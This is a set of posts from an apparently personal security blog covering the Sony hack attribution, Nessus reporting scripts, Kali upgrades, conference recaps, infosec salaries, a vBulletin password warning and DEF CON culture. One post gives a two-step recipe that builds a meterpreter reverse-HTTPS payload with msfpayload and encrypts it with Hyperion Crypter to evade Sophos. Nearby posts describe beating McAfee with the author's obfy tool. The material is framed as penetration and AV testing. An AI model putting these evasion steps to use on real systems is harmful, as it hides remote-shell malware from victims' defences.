Sony, the FBI, and NK

The FBI came out saying they thought North Korea hacked Sony: http://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation.

The main points are, malware code looked reused from previous code attributed to North Korea, the malware uses NK IP addresses, and the "tools" used were similar to a South Korea bank attack believed to be from NK, whatever that means. Here is the problem from the U.S. intelligence departments mouth:

Another indicator pointing to U.S. intelligence is the familiarity with Sony’s computer network. “It’s clear from the hard-coded paths and passwords in the malware that whoever wrote it had extensive knowledge of Sony’s internal architecture and access to key passwords,” Rogers notes. “While it’s plausible that an attacker could have built up this knowledge over time and then used it to make the malware, Occam’s razor suggests the simpler explanation of an insider.”

That is still all true, which makes the FBI release read like nonsense to me. Consider the possibility of a pure North Korea attack with no insider. That would mean the attacker would need to gain access to Sony's network, likely with an email phish attack or maybe an undetected web attack. Gain access to many files and find passwords in password files and system documentation and diagrams and piece together the information needed to make this malware. And while possible, that makes no sense at all to me. Once you have that level of access and understanding, making malware is the last thing you would do. At that point simply use normal system tools to extract all the data you want without being detected or leaving malware behind. Anyone knowledgeable to create this malware would know better than to use malware if they already had all the access they needed without it. This scenario makes no sense to me and as the quote above states, doesn't pass the Occam's razor test. Let's assume they had access, but couldn't use the tools they needed to get the data and needed to write their own code and...It just doesn't pass the test unless they know something they aren't telling us which is possible but still more assumptions and therefore still doesn't pass the test.

What does pass the test is an insider with this knowledge either is behind the attack, or willfully gave up this information to an attacker and is part of the attack. The attacker could still be North Korea, but only with an insider's help. But more likely that that, an insider working with another outside group with the skills needed and is intent on financial gain from extorting money from Sony and had the idea of trying to blame North Korea or just Korea in general for the attack to cover their tracks. If they knew how the company and media and governments would jump on it for their own self interests, they are brilliant. But I'm guessing they didn't know it would work out so well but rolled with it when the NK part of the story took on a life of its own. And why not? Now that the FBI said what they said, for whatever reason, it is hard for me to picture them finding and bringing to justice the criminals involved if it turns out NK wasn't behind it. And that is the dangerous part of this game which I predict will be played out again and again. How easy is it to get away with a crime like this and blame a nation state if we are so willing to let the nation state be blamed?

New Scripts and Old Script Changes

I pushed up some scripts I banged out today here: https://github.com/secjohn/nessus-reporting
I'm a blue team guy again and I needed a better way to share Nessus findings both vulnerability scans and compliance audit scans with my admins. The Nessus HTML and CVS exports just don't cut it, and I'm sick of manually editing the CVS exports to be something people want. So I made these scripts to turn .nessus files into spreadsheets my admins want and figured I would share them. They are freshly made and I'm sure some improvements are needed. But so far appear to work fine even on very large .nessus files.

I also commented out the crypter parts of obfy. It hasn't worked for a while now, even since some change to msfpayload. Obfy is still a quick way around McAfee, but that is about it at this point. I think it still works against some others if you manually run ditto on the payloads, but I never got ditto to work correctly with wine so I couldn't script it out. Veil is a better automated option for most things and I use it a lot now. Obfy is still good if you know you are going against McAfee or to edit an asm file you made yourself for a longer term custom payload like a signed payload for phishing, etc. But in general I wouldn't use obfy on a normal pentest if I didn't know the AV product anymore. I would highly recommend using it in AV testing if you are buying one.

Update to Kali-Scripts

It has been a while but I updated the Kali update script I have on github and added an kaliautoupgrade.sh script. They can ben found here: https://github.com/secjohn/kali-scripts

The kaliupdate.sh script has minor changes. The biggest one is I changed to dist-upgrade from just upgrade. When I wrote the script there was no difference and a dist-upgrade burned me once on BT5 back in the day so I didn't use it. The dist-upgrade seems to be needed and fine now though.

I'm on the blue team again and I now don't run everything from my laptop and having Kali on a server made me want a script for a cron job. So I edited down the script and tweaked the dist-upgrade line so conf files wouldn't stop it and made kaliautoupgrade.sh. If you have a Kali server and want to upgrade in cron, there you go. One warning, the script assumes things are there for the most part. The one time installs and checks are in the kaliupdate.sh script, you should run it once with a -a before setting up this job.

Kali Dist-Upgrade Issues Fun:
One note on the dist-upgrade, I did run into an issue with it. But is was resolvable. I got an error saying it couldn't finish and to run apt-get -f install to fix it. So I did and that failed. It said it needed to overwrite a file that was owned by another package. At the end it gives the deb file that has an error. If you run into that what you need to do is:
dpkg -i --force-overwrite /the/path/defilegivingtheerror.deb
apt-get -f install

That will let the file be overwritten. After the apt-get -f install finished you need to run the apt-get dist-upgrade again. I had it fail again and had to do the same steps above a second time. Life has been good since then.

SecureCIO Chicago and John McAfee

So I got invited to this thing. http://chicago.securecio.com/cm I wasn't sure how or why and I almost deleted it until I noticed John McAfee was speaking. Then I clicked the hell yes button. I figured either the people running this thing must be pretty cool or totally clueless and were going to freak out and either way this was going to be fun. So I went. It was a bit odd and slow for me at first. The host started with a urban legend a few seconds on snoops on my phone confirmed my hunch. Not long after that he said to use the news about big attacks to scare the crap out of our leaders to get more budget. I don't think he was kidding, maybe half kidding. Another speaker worked for a secure email company and talked about how his product helped secure email, joy. I was starting to wonder what I got myself into. Then at the break I found an old friend of mine and that was good. Then I saw Wendy's blue hair and I recognized her from B-Sides Vegas and I knew McAfee must be close and he was, playing the piano. I went and hung out with him as much as I could. The cool kids all came out to talk to him and as long as I was close to him I found it easier to talk to other people, these were my people. After his talk @minossec came over to say hi to him and it was cool to he him again too. It turns out the director of this thing is a cool guy and has worked with John McAfee before and like me was tying to hang out with him as much as possible and it was nice meeting him too. Finally John McAfee spoke. It was a good talk, different tone than B-Sides he knew the audience was different. Mostly he talked about phone insecurity and how we are all idiots for letting our flashlight app or bible reading app access our microphone and record us without telling us and how he has a new Android app which tells you when that happens and if you try it you will see how stupid you have been and how you are being spied on. I ended up at the bar there but bailed before it got too late and somehow totally forgot to eat dinner. McAfee left shortly after his talk unfortunately but it was great seeing him and hearing him speak.

Like I said, the person running this thing seems cool. Most of the more technical security leaders I know weren't there. We should try to fix that going forward, this thing has potential if we can get the right people to start showing up by mixing a bunch of burbsec/chisec folks in.

DerbyCon 4 Recap

I'm a bit late but here it is anyway. DerbyCon was good overall this year and still is my new favorite security con. I must say I felt the talks were overall not as strong as the last two years and I didn't walk away with as many good pieces of data and ideas. A feeling I confirmed with several other people. But it was still good and it isn't clear how much of that is based on the talks that were selected, or that the talks in 2014 just aren't as good as a whole, or it is a bullshit feeling and we are building old DerbyCon's up in our mind. But like I said, still my favorite, and I still plan to go next year. On a side note I explored more of Louisville this year than the years past and I'm starting to really love that city.

All the videos can be found here:
http://www.irongeek.com/i.php?page=videos/derbycon4/mainlist

If you didn't get to go or missed some talks here are a few I liked:
Threat Modeling for Realz – Bruce Potter
Application Whitelisting: Be Careful Where The Silver Bullet Is Aimed – David McCartney
InfoSec – from the mouth of babes (or an 8 year old) – Reuben A. Paul (RAPstar) and Mano Paul
How to Secure and Sys Admin Windows like a Boss. – Jim Kennedy
Building a Modern Security Engineering Organization – Zane Lackey
Information Security Team Management: How to keep your edge while embracing the dark side – Stephen C Gay
RavenHID: Remote Badge Gathering -or- Why we sit in client bathrooms for hours – Lucas Morris – Adam Zamora
Building a Web Application Vulnerability Management Program – Jason Pubal

This list is far from complete, I haven't watched all the videos of talks I've missed and want to see yet. But it is taking a while and I wanted to get this out. So consider that list a starting point, there are a whole lot of good talks up there. Everyone should spend a few hours to watch the ones that applies to you the most.

So far I think the best piece of info I got was from Jason Pubal's talk that exposted me to ThreadFix. It was a pain for me to get it working on Debian but that is just because I'm too stubborn to use Windows I guess. I think that might be another blog post soon. But let me say, my developers already love the thing and I just got it working. If you have developers and have to give them scan data check this tool out.

Let me know what videos you think I should watch that I didn't link. I won't watch them all so let me know if you think I'm missing something cool.

"So how come we still see so many low ball salary offers?"

This morning I saw this on twitter from @mckeay:

We keep hearing about how desparate companies are to hire infosec professionals. So how come we still see so many low ball salary offers?
— Martin McKeay (@mckeay) September 5, 2014

I wanted to respond but it will take more words than Twitter allows, so here is my answer. Let's see how bad @hackerHuntress thinks I screwed this up.

There are two main reasons. Reason one, the company doesn't care about security, the role is for a compliance check box and to have someone to fire when they get breached. Reason two, some senior person in the company is out of touch and refuses to believe a security person makes more than a Windows Admin and/or the companies salary ranges are fixed and the culture is so messed up they can't change them easily.

My overall advice is to avoid companies that post InfoSec jobs and very low salary ranges. My more complicated advice is as follows:

If you really, really want a job you see posted but the salary is crazy low. Say you can walk to the office or something. Apply anyway and see if you can talk to someone and help them understand the market, what you currently make, what the job is worth, etc. If the company is stuck with reason two above the recruiter and hiring manager may know this and are collecting evidence to sell it to HR or the CIO or whoever to get the salary range adjusted. If that is the case and it works out for them and you helped them make their case you will likely get a call in for an interview once they get the salary range adjusted. But if that turns out not to be the case, don't take the job! I don't care how close to your house the company is. If it turns out to be reason one, you will hate the job and get nothing done. Then at some point something bad will happen because they refused to let you do your job or take your advice and you will be fired and replaced by someone else willing to work for a low salary. Not a good career move. Either way, if you try this route don't have your hopes up, this will rarely work out because of timing. It may take them 6 months or even a year before they get their act together and call you because they got the salary ranged increased.

There is one group of people who can take advantage of the reason one companies, and let's face it someone should. People who are looking to get into the InfoSec field and are making less money than the job is offering anyway. This is not the ideal way to break into InfoSec, far from it. My typical advice is get a job in IT if you haven't already and become the security focused person on your team. Become buddies with the security team, and then when a junior role opens up you will get it. But if that isn't working out for you and you are say stuck on the help desk team, taking a security manager role that pays half what is should for a year or so is an option. Spend that year teaching yourself about security since they don't care what you do anyway, and then get a real security engineer job someplace else by highlighting what you taught yourself and make your title on your resume manager/engineer or something like that. But be warned, if you stick around too long they will fire you when a breach happens. Any company that will hire a help desk person on the cheap to be their security manager has one goal with the role. To fire the person when something bad happens. So get out before that happens, and know you are risking that happening before you are ready.

Obfy,Hyperion Crypter, and bypassing AV

I've noticed for a while now that payloads made by obfy that are encrypted with Hyperion Crypter don't seem to work on my system. I figured I screwed up crypter on my VM. But that isn't it, something else is wrong, I think.

First let me say there is a new version of Hyperion Crypter, you should download it and compile and install it.

Now with that out of the way I'm testing Sophos right now. While obfy by itself seems to still bypass McAfee with no issues it doesn't get past Sophos and with the crypter part broken I needed to do something else. So I tried smbexec and it worked fine against Sophos and I noted that the payload was encrypted by crypter and it worked. Note the compile and install it link above for smbexec and crypter info if that is new to you. So that got me wondering. Next I made a simple payload:
msfpayload windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=443 X >payload.exe
Then I ran crypter.exe on it:
cd /opt/crypter (crypter only seems to work while you are in the directory)
wine ./crypter.exe /root/payload.exe payloadc.exe

Payload.exe was picked up by Sohpos and will be by any AV program. But pyaloadc.exe worked fine and the shell worked. Simple as that. No viel framework, smbexec, encoding, magic or anything needed. msfpayload generated exe file ran though crypter.exe and Sohpos is fine with it. Two steps and easy (it should be noted this is the Sophos install I'm testing against which is a live corp PC and not managed/installed by me so it may or may not be everything they can do to detect payloads, configured well, etc).

This goes to show different AV bypassing techniques work better for different vendors and having many tools to pull from is your best option. That said, it annoys me why crypter.exe creates broken executables with obfy files but not msfpayload files and I don't know why or why it suddenly stopped working when I didn't change anything. I don't even know if this is a problem with everyone or just me.

If you use this tool and have feedback let me know. If I hear that it doesn't work for other people too and collectively we can't figure out why I will probably pull that option from the code. In reality the more powerful part of obfy is altering the ASM of just about any ASM file you feed into it quickly to save you the time of doing it manually. In that case it is still a nice supporting tool, and of course for the time being a bypass McAfee button for some strange reason. I expect that part to stop working, someday.

Change your password gamers

A quick note for all you online gamers out there. If you play online games, MMO's, etc and have for a while you probably have joined a fair number of online gaming boards over the years. Guild after guild most likely, plus alliance after alliance if you play EVE. A good number of those sites are running VBulletin software. If you game a lot you probably recognize a VBulletin site without even having to scroll down to the bottom and see the logo and are happy to see it and not a less friendly free forum site. Well there is a new SQLi attack for the 5.X branch of that software and the people who found it said they will release the code in the wild soon. The official announcement is here: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4097503-security-patch-release-for-vbulletin-5-0-4-5-0-5-5-1-0-5-1-1-and-5-1-2

It should be noticed this isn't the first SQLi attack found in this software over the years. But I have a feeling this one is going to be used a lot so I'm giving this warning.

For those who don't know, a SQLi attack allows people to collect data from the database the site uses to store things like, say, your username and password. VBulletin by default stores passwords using an MD5 hash and a 3 character salt. If you don't know what that means, just know it means it is easy to crack and get your password, especially weak ones. No biggie right? Well ask yourself...

On any of these numerous sites you signed up to over the years (god help EVE players they probably can't even find all the old alliance ones), how easy it is for someone to find the game or games you play and the username you use to login with? If you are good your login name is nowhere on any of these sites for most games and your account names aren't the same or a single character off from them. Some games like ESO are idiotic and force you to tell everyone your login name however. If by chance you play ESO or one of your character's name is also your login name for a game and you give that name up in posts or signatures or profiles in forums all over the Internet, ask yourself this. Did you use the same password on one or more game forum that you use to login to the game with? If so, you are either going to spend some time changing passwords, or learn a life lesson the hard way when your account is banned for gold selling or something and when you finally get it unbanned you have nothing even your characters are deleted,

Think about it. You should never use game password on forum sites, ever, ever, ever. And changing 1 character at the end isn't clever enough not to get figured out btw.

So if you are freaking right now do this:

1. Stop using your character name as your login name where you can help it (ESO aside that was a bad move on their part)

2. Never use passwords for games on any other website

3. Go change all your game passwords

If you share passwords you likely don't have a system and/or password manager. Here is some final advice.

Come up with a system to help you remember passwords without sharing them. Like incorporating part of the same of the site into the password.

Use a password manager. Here are three I like:

LastPass: Web plugin cross platform. My current option due to the cross platform, free

KeePass: Good stand alone one for Windows, I found it annoying on the Mac, free

PINs: Good stand alone on for Windows, older now but still good and doesn't need an install. The password file and the exe is all you need and it works so it is 100% portable, but Windows only, free

 

It is time for DEF CON to grow up

I've been putting this blog post off for a while and I've read a few others like it while I've been putting it off so I almost didn't bother. But I think I have something slightly different to say so I decided it was worth it. Let me start from the beginning. DEF CON is special to me. DEF CON 8 was pure magic in my life, that was my first one and it changed my life. I've been to every one since except for one due to the birth of my child which was poor planing on my part. So what I say is with love and real feedback.

At DEF CON 8 it was also my first trip to Vegas. All the half dressed women walking around some handing out floppy disk with nude pics of themselves on them was part of the Vegas experience to me. I loved it. But that was a long time ago. I recently had to explain to a good female friend of mine that was wanting to go to DEF CON that it was probably a bad idea. I did it by explaining in detail how Hacker Jeopardy worked. Oh..she said. Then I had to explain that a good number of con goers have limited social skills and it would be highly likely for her to get stared at and inappropriately propositioned during the con and the Goons would almost certainly ignore any complaints about it. She decided not to go, which I thought was wise.

That conversation got me wondering, do I want my daughter to go when she is old enough? I've always wanted that since I had kids but the more I think of it, the more the answer is no, unless the con grows up. It will be a world she will be unfamiliar with and I don't want to expose it to her in that way. In short, DEF CON's attitude about women is roughly based on a young white male's attitude was roughly 20 years ago.

So, it is past time for DEF CON to grow up. It is no more appropriate for DEF CON to still have 20 year old attitudes about women then it would be for say a southern country club to still have 50 year old attitudes about race. There should be no objectifying women in any official event, which would include no striping in Hacker Jeopardy. Women and men not wearing enough cloths should be asked to leave until fully dressed. Goon's should be trained to not only deal with inappropriate and unwanted advances and comments properly but should look for them and act upon them even if the victim doesn't complain since the problem is already well known. That should hopefully set the tone and change the culture and after a year or two the Goon's could back off a bit.

I don't think any of this will happen. That said my plan this year is to skip Black Hat and go to B-Sides Vegas instead. I plan to go to DEF CON but I don't plan to spend a dime on anything but a badge. Not a huge protest I know, but it is a start and like I said, DEF CON is special to me. I'll see how things go. If nothing changes this year and there is nothing to make me thing it will be different next year, I probably won't be going back to DEF CON after this year until I hear they have changed. There is no reason to put up with it anymore. B-Sides in many cities are great and DerbyCon is great.

I recommend everyone else that goes think about this as well and if it matters to you start making your voices heard and stop going if they don't listen. Times are different, we can skip DEF CON without missing out and I'm starting to think we should.